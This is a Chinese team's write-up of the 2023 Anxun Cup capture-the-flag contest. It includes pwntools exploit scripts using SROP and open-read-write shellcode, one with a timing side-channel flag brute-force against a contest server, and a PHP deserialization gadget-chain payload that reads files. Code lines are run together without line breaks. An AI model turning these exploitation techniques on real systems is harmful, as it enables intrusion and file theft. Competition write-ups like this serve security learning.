为增强学生对网络及信息安全知识的兴趣,激励学生学习网络及信息安全技术的积极性;培养学生的创新意识、协作精神;提高学生利用信息安全知识解决实际题的能力;吸引、鼓励广大学生踊跃参加课外科技活动,并从中发现人才, 四川安洵信息技术有限公司 现携手 成都信息工程大学道格安全研究实验室 举办面向全国高校的 第六届“安洵杯”网络安全挑战赛 。
本次比赛,团队取得了11名的成绩。人生难免有遗憾,但君子不以物喜,不以己悲;莫忘初心,方能日臻卓越。吾等虽未得鹤立云霄之嘉名,然团结协力,齐心协力之精神实乃珍贵无比。同样恭喜前十名的团队取得优胜,并为所有鏖战于昨天的安全师傅们献上诚挚的感谢!前路漫漫,我们将继续努力,不负希望!
Pwn
side_channel , initiate!
思路shellcode的OR缺W,打一个侧信道逐位爆破
from pwn import *context(arch='amd64',os='linux')#,log_level='debug')import timeimport stringfstr='-0123456789abcdefghijklmnopqrstuvwxyz'mov_rax_f_ret=0x401193syscall=0x40118Abss=0x404060saddr=0x405000leave_ret=0x401446start=0x404000sig=SigreturnFrame()sig.rax=0xasig.rdi=startsig.rsi=0x2000sig.rdx=0x7sig.rsp=bss+0x200sig.rip=syscalldef pwn(io,index,ch):shellcode=b'x90'*0x20shellcode+=asm(shellcraft.open('flag'))shellcode+=asm(shellcraft.read(3,'rsp',0x50))shellcode+=asm('''loop:cmp byte ptr[rsi+{0}],{1}jz loopret'''.format(index,ch))sig2=SigreturnFrame()sig2.rax=0x0sig2.rdi=0x0sig2.rsi=saddrsig2.rdx=len(shellcode)sig2.rsp=bss+0x400sig2.rip=syscallio.recvuntil(b'easyhackn')payload=b'flag'.ljust(8,b'x00')+flat(mov_rax_f_ret,syscall)+bytes(sig)payload=payload.ljust(0x200,b'x00')payload+=flat(0,mov_rax_f_ret,syscall)+bytes(sig2)payload=payload.ljust(0x400,b'x00')payload+=flat(0,saddr)#gdb.attach(io)io.sendline(payload)io.recvuntil(b'Do u know what is SUID?n')payload=flat(b'a'*0x2a,bss,leave_ret)io.send(payload)io.send(shellcode)#io.interactive()if __name__ == '__main__':flag=''for i in range(0x30):for ch in fstr:#io=process('./ax_shc')io=remote('47.108.206.43',41376)print('testing ch {}'.format(ch))pwn(io,i,ord(ch))start=time.time()try:io.recv(timeout=5)except:passend=time.time()io.close()if end-start>4.5:flag+=chprint(' find flag: ',flag)break
Seccomp
SROP+ORW解决
from pwn import *context(log_level='debug',arch='amd64',os='linux')mov_rax_f_ret=0x401193flagaddr=0x405000syscall=0x40118Abss=0x404060saddr=0x405000leave_ret=0x40143Cstart=0x404000#io=remote('io=process('./ax_seccomp')sig=SigreturnFrame()sig.rax=0x2sig.rdi=bsssig.rsi=0sig.rsp=bss+0x200sig.rip=syscallsig2=SigreturnFrame()sig2.rax=0sig2.rdi=3sig2.rsi=saddrsig2.rdx=0x50sig2.rsp=bss+0x400sig2.rip=syscallsig3=SigreturnFrame()sig3.rax=1sig3.rdi=1sig3.rsi=saddrsig3.rdx=0x50sig3.rsp=bss+0x600sig3.rip=syscallpayload=b'flag'.ljust(8,b'x00')+flat(mov_rax_f_ret,syscall)+bytes(sig)payload=payload.ljust(0x200,b'x00')payload+=flat(0,mov_rax_f_ret,syscall)+bytes(sig2)payload=payload.ljust(0x400,b'x00')payload+=flat(0,mov_rax_f_ret,syscall)+bytes(sig3)io.recvuntil(b'easyhackn')io.sendline(payload)io.recvuntil(b'Do u know what is SUID?n')payload=b'a'*0x2a+flat(bss,leave_ret)#gdb.attach(io)io.send(payload)io.interactive()
web
what's my name
本地搭建echo $miao发现lambda自增,那第二个if完全可控,可以使用create_function()注入攻击
easy_unserialize
__wakeup->__unset->__isset->__toString->__invoke
empty触发isset
preg_match触发toString
error_reporting(0);class Good{public $g1;private $gg2;public function __construct($ggg3){$this->gg2 = $ggg3;}public function __isset($arg1){if(!preg_match("/a-zA-Z0-9~-=!^+()/",$this->gg2)){if ($this->gg2){$this->g1->g1=666;}}else{die("No");}}}class Luck{public $l1;public $ll2;private $md5;public $lll3;public function __construct($a){$this->md5 = $a;}public function __toString(){$new = $this->l1;return $new();}public function __get($arg1){$this->ll2->ll2('b2');}public function __unset($arg1){if(md5(md5($this->md5)) == 666){if(empty($this->lll3->lll3)){echo "There is noting";}}}}class To{public $t1;public $tt2;public $arg1;public function __call($arg1,$arg2){if(urldecode($this->arg1)===base64_decode($this->arg1)){echo $this->t1;}}public function __set($arg1,$arg2){if($this->tt2->tt2){echo "what are you doing?";}}}class You{public $y1;public function __wakeup(){unset($this->y1->y1);}}class Flag{public function __invoke(){echo "May be you can get what you want here";array_walk($this, function ($one, $two) {$three = new $two($one);foreach($three as $tmp){echo ($tmp.'<br>');}});}}$flag = new Flag();//$flag->DirectoryIterator = '/';$flag->SplFileObject = '/FfffLlllLaAaaggGgGg';$luck = new Luck('ukfc');$luck->l1 = $flag;$good = new Good($luck);$luck2 = new Luck(213);$luck2->lll3 = $good;$you = new You();$you->y1 = $luck2;//$a = serialize($you);$a = urlencode(serialize($you));echo $a;echo '';unserialize($a);
Crypto
010101
-
nc得到三个参数npc
-
然后看逻辑就是p替换了两个bit输出来了,爆破就行了【这个地方比赛环境当时有点问题,我卡了有半个小时,脚本没动,数据不对】
from Crypto.Util.number import long_to_bytesfrom gmpy2 import invertn =s = '1101100101111101001110011011001110011101111100000010100010100010110110100000001001110011111...'c =e = 0x10001s1 = s[:1024]s2 = s[1024:]print(s1)print(s2)for i in range(len(s1)):if s1[i] == '0':for j in range(len(s2)):if s2[j] == '1':temp = s1[:i] + '1' + s1[i+1:] + s2[:j] + '0' + s2[j+1:]p = int(temp, 2)if n % p == 0:q = n //pphi = (p-1) * (q-1)d = invert(e,phi)m = pow(c,d,n)print(long_to_bytes(m))
Misc
签到
Nahida
-
逆转搞出图片
# 打开输入文件和输出文件with open('Nahida!', 'rb') as input_file, open('output.jpg', 'wb') as output_file:# 读取输入文件的所有字节data = input_file.read()for i in data[::-1]:output_file.write(int.to_bytes(((i >> 4) | (i << 4))&0xff) )
然后,梭
疯狂的麦克斯
-
docx变zip,后面文字rot22,加上提示base64
-
直接把列表所有元素rot22然后base64,再放进去爆破
s =import base64result = []def sort_by_numbers(item):return int(item[0])def rot22_encrypt(text):encrypted_text = ""for char in text:if char.isalpha():ascii_offset = 65 if char.isupper() else 97encrypted_char = chr((ord(char) - ascii_offset + 22) % 26 + ascii_offset)encrypted_text += encrypted_charelse:encrypted_text += charreturn encrypted_text# 打印结果for i in s:m = str(base64.b64encode(rot22_encrypt(i).encode()))print(m[2:-1])
misc-dacong_no_windows
使用Imdisk工具将dacong.raw在电脑上挂载,并使用diskgenius的恢复功能恢复出挂载映像中的文件
flag有提示,分为三段,先找的flag2和flag3
得出的文件中flag2是个压缩包。
里面一句话
Once upon a time there were three girls, one with white hair, one with black hair, and one with green hair. In a cold winter, Xiao Bai and Xiao Hei hid Xiao Lu's favorite green onions. Looking at the heavy snow outside the window, can you find where the green onions are?
解出来_tHE_Dddd
flag3是
U2FsdGVkX18M+E34cKJlmTU3uo1lHqjUQhKPTBGJiMjg4RWX6saTjOJmLU8653
base64之后发现有Salted__字样,判断出来是aes,密码在注册表里
d@@Coong_LiiKEE FOr3NsIc
解出来是dAc0Ng_SIst3Rs????}
flag1在恢复出的图形类里有很小张图
mmsstv,找到音频39(初音未来懂得都懂)
图片里面flag{Ar3_Th3Y
合起来即可
RE
mobilego
-
so的check看了一会比较难崩,但是看flag的密文形式很像简单位置替换
-
所以直接输编码表,jeb动调然后得到替换表
-
解密就行
flag密文的话有string.cmp,直接追踪资源就行
ori = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ab'key = 'V8L3ObJT4PK2MYZFQBSHUCXWI0AGa51D679NER'v = '49021}5f919038b440139g74b7Dc88330e5d{6'for i in ori:print(v[key.index(i)],end='')# D0g3{4c3b5903d11461f94478b7302980e958}
感觉有点点简单
-
文件sys挺吓人,实际就一个改了的RC4和base64,都不需要运行
-
base改了爆破就行了,逆还得动脑子
using namespace std;int encode(char *a1, char *a2, int len){int v4; // [rsp+0h] [rbp-88h]int v5; // [rsp+4h] [rbp-84h]char table[80]; // [rsp+10h] [rbp-78h] BYREFstrcpy(table, "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh");v4 = 0;v5 = 0;while ( v4 < len ){a1[v5] = table[a2[v4] & 0x3F];a1[v5 + 1] = table[(4 * (a2[v4 + 1] & 0xF)) | ((a2[v4] & 0xC0) >> 6)];a1[v5 + 2] = table[(16 * (a2[v4 + 2] & 3)) | ((a2[v4 + 1] & 0xF0) >> 4)];a1[v5 + 3] = table[(a2[v4 + 2] & 0xFC) >> 2];v4 += 3;v5 += 4;}if ( len % 3 == 1 ){a1[v5 - 2] = '=';a1[v5 - 1] = '=';}else if ( len % 3 == 2 ){a1[v5 - 1] = '=';}string temp = "4Uw=";if (temp[0] == a1[0] && temp[1] == a1[1] && temp[2] == a1[2] && temp[3] == a1[3]){return 1;}return 0;}int main(){string t = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh";char a1[100];char a2[2] = {};for(int i = 0; i < 126; i++){for(int j = 0; j < 126; j++){for(int k = 0;k < 126; k++){a2[0] = i;a2[1] = j;if(encode(a1,a2,2) == 1){cout <<(int)a2[0] <<"," <<(int)a2[1]<<",";return 0;}}}}}//92,33,123,51,81,51,56,40,58,43,48,64,22,44,51,37,54,4,56,70,81,60,37,74,19,51,57,59,105,39,77,41,51,20,51,70,48,49,50,64,108
-
RC4 64改写
typedef unsigned longULONG;using namespace std;/*初始化函数*/void rc4_init(unsigned char*s, unsigned char*key, unsigned long Len){int i = 0, j = 0;char k[64] = { 0 };unsigned char tmp = 0;for (i = 0; i<64; i++){s[i] = i;k[i] = key[i%Len];}for (i = 0; i<64; i++){j = (j + s[i] + k[i]) % 64;tmp = s[i];s[i] = s[j];s[j] = tmp;}}/*加解密*/void rc4_crypt(unsigned char*s, unsigned char*Data, unsigned long Len){int i = 0, j = 0, t = 0;unsigned long k = 0;unsigned char tmp;for (k = 0; k<Len; k++){i = (i + 1) % 64;j = (j + s[i]) % 64;tmp = s[i];s[i] = s[j];s[j] = tmp;Data[k] ^= (i ^ j) & s[(((i ^ j) + s[i] + s[j]) % 64)];}}int main(){unsigned char s[64] = { 0 };char key[64] = {0x74, 0x68, 0x65, 0x5F, 0x6B, 0x65, 0x79, 0x5F};char pData[512] = {92,33,123,51,81,51,56,40,58,43,48,64,22,44,51,37,54,4,56,70,81,60,37,74,19,51,57,59,105,39,77,41,51,20,51,70,48,49,50,64,108};unsigned long len = strlen(pData);rc4_init(s, (unsigned char*)key, strlen(key));rc4_crypt(s, (unsigned char*)pData, 90);for(int i = 0; i < len; i++){printf("%c",pData[i]);}return 0;}//D0g3{608292C4-15400BA4-B3299A5C-704C292D}
PE
-
有点可惜,但也正常,太久不看的人是这样的
-
动调call恢复function可以进入主逻辑,加密过程也很简单
-
就剩一张当时截的图,v5 < 0,8个字节一组进行处理
def decrypt(value, key):assert key & 1key |= 1 << 64for i in range(64):if value & 1:value = (value ^ key) >> 1else:value = value >> 1return valueout = bytes.fromhex('4db87629f5a99e595556b1c42f212c30b3797817a8edf7dbe153f0dbe903515e09c100dff096fcc1b5e6629501000000')flag = b''for i in range(0, len(out), 8):v = int.from_bytes(out[i: i + 8], 'little')flag += decrypt(v, 0x54aa4a9).to_bytes(8, 'little')print(flag)
牢大想你了
-
混淆的挺好,下次别混淆了
-
manager/data定位核心dll,dotpeek反编译
-
找到Tea的密文和密钥,直接解密【花里胡哨的没用代码一大坨】
void decrypt(unsigned int v[], unsigned int k[]) {unsigned int v0 = v[0];unsigned int v1 = v[1];unsigned int delta = 2654435769;unsigned int sum1 = delta * 32;int i;for (i = 0; i < 32; i++) {v1 -= ((v0 << 4) + k[2]) ^ (v0 + sum1) ^ ((v0 >> 5) + k[3]);v0 -= ((v1 << 4) + k[0]) ^ (v1 + sum1) ^ ((v1 >> 5) + k[1]);sum1 -= delta;}for (i = 0; i < 4; i++) {printf("%c", (v0 >> (8 * i)) & 0xff);}for (i = 0; i < 4; i++) {printf("%c", (v1 >> (8 * i)) & 0xff);}}int main() {unsigned int data[] = {3363017039, 1247970816, 549943836, 445086378, 3606751618, 1624361316, 3112717362, 705210466,3343515702, 2402214294, 4010321577, 2743404694};unsigned int key[] = {286331153, 286331153, 286331153, 286331153};int i;for (i = 0; i < sizeof(data) / sizeof(unsigned int); i += 2) {decrypt(&data[i], key);}return 0;}
你见过蓝色的小鲸鱼
-
题目提示了blowfish加密,那么第一步要做的就是确认代码是否是一个正常的加密
-
然后密钥UzBtZTBuZV9EMGcz
-
密文dump出来:
-
11A51F049550E2508F17E16CF1632B47
-
在线网站直接解密
D0g3{UzBtZTBuZV9EMGczQHRoZWJsdWVmMXNo}
想了解更多?进群细说!
qq群码
原文始发于微信公众号(UKFC安全):UKFC 2023安洵杯WP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论